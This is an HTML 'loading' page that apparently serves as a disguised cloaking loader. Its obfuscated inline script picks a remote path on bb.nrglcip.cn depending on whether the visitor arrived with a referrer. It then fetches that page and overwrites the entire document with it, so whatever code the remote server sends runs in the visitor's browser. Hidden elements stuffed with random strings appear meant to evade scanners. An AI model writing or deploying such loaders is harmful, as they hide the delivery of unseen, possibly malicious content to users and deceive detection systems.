<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YiLID9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YiLID9 .emkiP3aE {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YiLID9 .content {
            line-height: 50px;
            text-align: center
        }

        .YiLID9 .img {
            width: 100%
        }

        .YiLID9 .htzfBp349Ow {
            text-align: center
        }

        .YiLID9 .htzfBp349Ow span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YiLID9 .htzfBp349Ow span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YiLID9 .htzfBp349Ow span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YiLID9 .htzfBp349Ow span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YiLID9 .htzfBp349Ow span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YiLID9 .htzfBp349Ow span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YiLID9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FTo6isGmQU(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SyoUhWu = FTo6isGmQU('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SyoUhWu +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SyoUhWu +".html?a=share";
		}
		
        B6ZG25VfA1=url+"#"+new Date().getTime();
        B6ZG25VfA1 && function() {
            $.get(B6ZG25VfA1, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>XRrPJZ5nwKIaOZqnE67lyDlmX3ozG5MM7sXn</div>
<li style='display:none' >Q1RulkHTrAZ9j5JVf3zJISVuBf0wfTaEJeKTPjLOgnXDJBeS852BjolIMaeyTgT9nBHPchJ6eFyJHjsErjlnqKDwhnMQW</li>
<h1 style='display:none' >IYuefKyntT0YwUrctd3aS0mVywTWOXkOfC6XUIImMVswMDuLP</h1>
<span style='display:none'>wJZ02waMeiwbE4IYMjUcmTJxbASuYkWpf8I3CV1aWmezdHWeeIQU9sPeNj8upk8Yi5AmmLpA7CVmvnMXeR2b9MhQCBBfAq8oKGeP</span>
<b style='display:none' >zsU7bCziuZF3PawyagIpPXHk8Pr2JeHJkWhLzc0w1RuyxyZCURYGgOMuUyFuuLQanBtYI5LMoJ4mdckL3f3ZE23oOUqNk92h3ofV</b>
<p  style='display:none'>eowBJvHVWXYG4tyGLVCPNTxPZ5l27B0unqWJkjUSSnibb6Q6Rmlc7</p>
<h1 style='display:none' >IYuefKyntT0YwUrctd3aS0mVywTWOXkOfC6XUIImMVswMDuLP</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >IYuefKyntT0YwUrctd3aS0mVywTWOXkOfC6XUIImMVswMDuLP</h1>
<a  href='#' style='display:none'>eUhfKO9aawiDVDh1SXLauQqA5QqpscZh1I4p79KMSYt5FYVXGMqnN6khbdIyTmXUMtgPZ</a><div class="YiLID9">
    <div class="emkiP3aE">
        <div class="htzfBp349Ow">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >uT2VlxKQuq0tetZqocd</b>
<li style='display:none' >f9fz2c6EsvBIO33kwvTrjBNAhcdFuseTlg5BN1cM2qni</li>
<a  href='#' style='display:none'>X1iRkH3VuIbGL9VTSuz1SHDLc9OLRmdkT3b86jJyYET9sn83GnKfZmiG4bPEVBr</a></body>
</html>